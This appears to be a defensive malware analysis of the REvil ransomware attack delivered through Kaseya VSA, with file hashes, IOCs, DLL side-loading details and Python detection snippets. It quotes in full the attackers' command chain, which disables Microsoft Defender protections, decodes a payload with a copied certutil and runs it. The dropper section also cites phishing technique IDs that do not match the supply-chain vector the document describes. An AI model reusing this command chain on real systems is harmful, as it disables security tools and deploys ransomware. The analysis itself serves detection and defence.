REvil Kaseya — sample analysis
On 2 July, Kaseya published an advisory stating it was under cyberattack with impacts to the VSA suite. This software enables patch management and monitoring of IT infrastructure and systems.
In the following days, the incident was identified as a supply-chain ransomware attack.

Compromise Initiation
The malicious payload was delivered to VSA servers and from there to the VSA Agent applications running on managed Windows devices. This gave REvil and the specific operator behind the campaign the capability to initiate the attack. In this manner, the threat actors:
- initiated compromise through a trusted channel;
- exploited trust in VSA agent code, reflected in the anti-malware software exclusions required by Kaseya software.
Code executed by the Kaseya Agent Monitor therefore bypasses anti-malware scanning because of these exclusions, which let the threat actors distribute their dropper without detection.
To maximize damage and execute unimpeded, the threat actors leveraged Kaseya software to forcibly disable antivirus protection and initiated ransomware execution via the following command:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
ping 127.0.0.1 -n 4979 > nul
Used as a timer: sends a random number (in this case 4979) of ICMP echo requests to localhost, roughly one per second, with the output discarded to nul, so the rest of the chain runs only after the delay has elapsed.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Contains a PowerShell command to disable Microsoft Defender protection by disabling the following features:
- Real-time protection
- Network protection against exploitation of known vulnerabilities
- Scanning of all downloaded files and attachments
- Scanning of scripts
- Ransomware protection
- Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
- Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
- Automatic sample submission to Microsoft
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
Creates a copy of the certificate services utility and places it at C:\Windows\cert.exe.
Certutil.exe can be used to dump and display certificate authority (CA) configuration information, configure certificate services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.
echo %RANDOM% >> C:\Windows\cert.exe
Appends a random number to the end of the cert.exe file in an attempt to evade security solutions that monitor the hash of cert.exe.
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
The CERTUTIL copy decodes the Base64-encoded payload from AGENT.CRT and writes it to the executable AGENT.EXE in Kaseya's working directory.
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
The original payload file C:\KWORKING\AGENT.CRT and the CERTUTIL copy are deleted.
c:\kworking\agent.exe
Finally, the AGENTMON.EXE process executes AGENT.EXE. In this manner, the new process inherits system privileges from AGENTMON and ransomware deployment begins.
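A defender-side check for the launch chain walked through above, written as an added example (not code from the original report): each stage of the command line gets a pattern, and an alert fires only when several stages co-occur, since a lone loopback ping or an administrator's certutil -decode is too common to page on. The event fields and the threshold are assumptions; event 1 carries the command line quoted in the report, events 2 and 3 are constructed benign look-alikes.

```python
import re

# One pattern per stage of the launch command quoted in the report.
STAGE_PATTERNS = [
    ("ping_sleep",      re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I)),
    ("defender_tamper", re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+\$true", re.I)),
    ("certutil_copy",   re.compile(r"copy\s+(?:/y\s+)?\S*certutil\.exe\s+\S+", re.I)),
    ("hash_bump",       re.compile(r"echo\s+%RANDOM%\s*>>\s*\S+\.exe", re.I)),
    ("certutil_decode", re.compile(r"\S+\.exe\s+-decode\s+\S+\.crt\s+\S+\.exe", re.I)),
    ("cleanup",         re.compile(r"del\s+(?:/\w\s+)*\S*agent\.crt", re.I)),
]

def match_stages(cmdline):
    """Return the tags of every stage whose pattern occurs in the command line."""
    return [tag for tag, rx in STAGE_PATTERNS if rx.search(cmdline)]

def is_kaseya_style_launch(cmdline, min_stages=3):
    """Alert only when min_stages distinct stages appear in one command line (assumed threshold)."""
    return len(match_stages(cmdline)) >= min_stages

def scan_events(events, min_stages=3):
    """Map event id -> matched stage tags for every event that crosses the threshold."""
    return {ev["id"]: match_stages(ev["cmdline"]) for ev in events
            if is_kaseya_style_launch(ev["cmdline"], min_stages)}

# Constructed process-creation events (assumed schema: id, parent, cmdline).
SAMPLE_EVENTS = [
    {"id": 1, "parent": "AgentMon.exe", "cmdline":
        r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
        r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
        r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
        r'-DisableIOAVProtection $true -DisableScriptScanning $true '
        r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
        r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
        r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
        r'echo %RANDOM% >> C:\Windows\cert.exe & '
        r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
        r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'},
    # Benign: short connectivity check, single-digit count, nothing else chained.
    {"id": 2, "parent": "explorer.exe", "cmdline": r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 4 > nul'},
    # Benign: an administrator decoding a certificate; one stage alone stays below the threshold.
    {"id": 3, "parent": "cmd.exe", "cmdline": r'certutil.exe -decode C:\temp\server.crt C:\temp\server.exe'},
]

if __name__ == "__main__":
    for event_id, tags in scan_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: stages {tags}")
```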
Static Analysis
Initial File
Tags
Dropper
Details
| original name | AGENT.EXE |
| md5 | 561CFFBABA71A6E8CC1CDCEDA990EAD4 |
| sha1 | 5162F14D75E96EDB914D1756349D6E11583DB0B0 |
| sha256 | D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E |
| file-size | 912 264 (bytes) |
| entropy | 6.952 |
| imphash | 59349B1648EDDF021C01F05A17A0E870 |
| file-type | executable |
| cpu | 32-bit |
| Virustotal | score 44/68 |
Description
File signed by PB03 TRANSPORT LTD, identified as the malware dropper for REvil/Sodinokibi. The dropper creates two files in the hard-coded path "C:\Windows\"; both payloads are embedded in the dropper itself and referenced as two resources. Detection and analysis of such dropper behaviour is critical to understanding the initial compromise vector; continuous monitoring of process execution and resource-loading patterns enables early identification of T1566 (Phishing) and T1566.002 (Phishing: Spearphishing Attachment) delivery mechanisms.

First dropped file
Tags
Microsoft Windows Defender
Details
| original name | MsMpEng.exe |
| md5 | 8CC83221870DD07144E63DF594C391D9 |
| sha1 | 3D409B39B8502FCD23335A878F2CBDAF6D721995 |
| sha256 | 33BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A |
| file-size | 22 224 (bytes) |
| entropy | 6.803 |
| description | Antimalware Service Executable |
| file-type | executable |
| cpu | 32-bit |
| Virustotal | score 0/68 |
Description
The file is identified as a legitimate copy of Microsoft Windows Defender (MsMpEng.exe).
This Defender copy side-loads the malicious DLL and is then used to carry out the file-encryption phase from within a legitimate, signed process, implementing T1036.005 (Masquerading: Match Legitimate Name or Location) and T1574.001 (Hijack Execution Flow: DLL Search Order Hijacking).


Second dropped file
Tags
Revil
Details
| original name | MpSvc.dll |
| md5 | A47CF00AEDF769D60D58BFE00C0B5421 |
| sha1 | 656C4D285EA518D90C1B669B79AF475DB31E30B1 |
| sha256 | 8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD |
| entropy | 6.979 |
| imphash | C699899ABB1119ED2B5C97D5D1D4542E |
| file-type | dynamic-link-library |
| cpu | 32-bit |
| file-size | 808 328 (bytes) |
| Virustotal | score 48/68 |
Description
Malicious DLL containing the REvil payload, loaded into the legitimate Windows Defender executable to perform the encryption operations.
The DLL exports three functions: ServiceCrtMain, ServiceMain and SvchostPushServiceGlobals.
ServiceCrtMain is the export through which the malicious instructions are retrieved and executed.
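A check for the side-loading pattern described for the two dropped files, added here as an example rather than code from the report: a Defender binary running from a directory where Microsoft does not install it, a same-named MpSvc.dll sitting next to it, and a module hash matching the report's IOC table each produce a finding. The image-load event schema, the expected Defender directories and the version folder in the benign sample are assumptions.

```python
import ntpath  # Windows path semantics even when the check runs on another OS

# Directories where Defender's platform binaries normally live (assumed; adjust to your fleet).
EXPECTED_DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)

# SHA256 values taken from the report's IOC table.
KNOWN_BAD_SHA256 = {
    "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a": "outdated_msmpeng_exe",
    "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd": "revil_mpsvc_dll",
}

def in_expected_dir(path):
    """True when the file's directory is one of the expected Defender directories or below one."""
    d = ntpath.dirname(path).lower()
    return any(d == e or d.startswith(e + "\\") for e in EXPECTED_DEFENDER_DIRS)

def check_image_load(event):
    """event: {"image": process exe path, "module": DLL path, "module_sha256": hex}. Returns findings."""
    findings = []
    image, module = event["image"], event["module"]
    same_dir = ntpath.dirname(image).lower() == ntpath.dirname(module).lower()
    if ntpath.basename(image).lower() == "msmpeng.exe" and not in_expected_dir(image):
        findings.append("msmpeng_outside_defender_dir")
    # The report's chain drops MpSvc.dll beside the relocated MsMpEng.exe so that it wins the search order.
    if ntpath.basename(module).lower() == "mpsvc.dll" and same_dir and not in_expected_dir(module):
        findings.append("mpsvc_sideload_candidate")
    label = KNOWN_BAD_SHA256.get(event.get("module_sha256", "").lower())
    if label:
        findings.append("ioc_hash_match:" + label)
    return findings

# Constructed image-load events: event 0 mirrors the report's drop locations and DLL hash;
# event 1 is a legitimate platform layout with a constructed version folder and a dummy hash.
SAMPLE_IMAGE_LOADS = [
    {"image": r"C:\Windows\MsMpEng.exe", "module": r"C:\Windows\MpSvc.dll",
     "module_sha256": "8DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD"},
    {"image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0000.0-0\MsMpEng.exe",
     "module": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0000.0-0\MpSvc.dll",
     "module_sha256": "00" * 32},
]

if __name__ == "__main__":
    for ev in SAMPLE_IMAGE_LOADS:
        print(ev["image"], "->", check_image_load(ev) or "clean")
```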

Indicators of Compromise (IOC)
| Indicator_type | Data | Note |
| --- | --- | --- |
| file_path_name | C:\windows\cert.exe | Copied CERTUTIL |
| file_path_name | C:\windows\msmpeng.exe | Outdated Defender executable vulnerable to DLL sideload |
| sha256 | 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a | Outdated Defender executable vulnerable to DLL sideload |
| file_path_name | C:\kworking\agent.crt | REvil dropper used in Kaseya exploit |
| sha256 | d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e | REvil dropper used in Kaseya exploit |
| file_path_name | C:\windows\mpsvc.dll | REvil ransomware DLL |
| sha256 | 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd | REvil ransomware DLL |
DLL sideloading remains a persistent technique for evading detection and achieving code execution within trusted system processes; organisations must maintain current patch levels and monitor for unsigned or mismatched DLL loading patterns.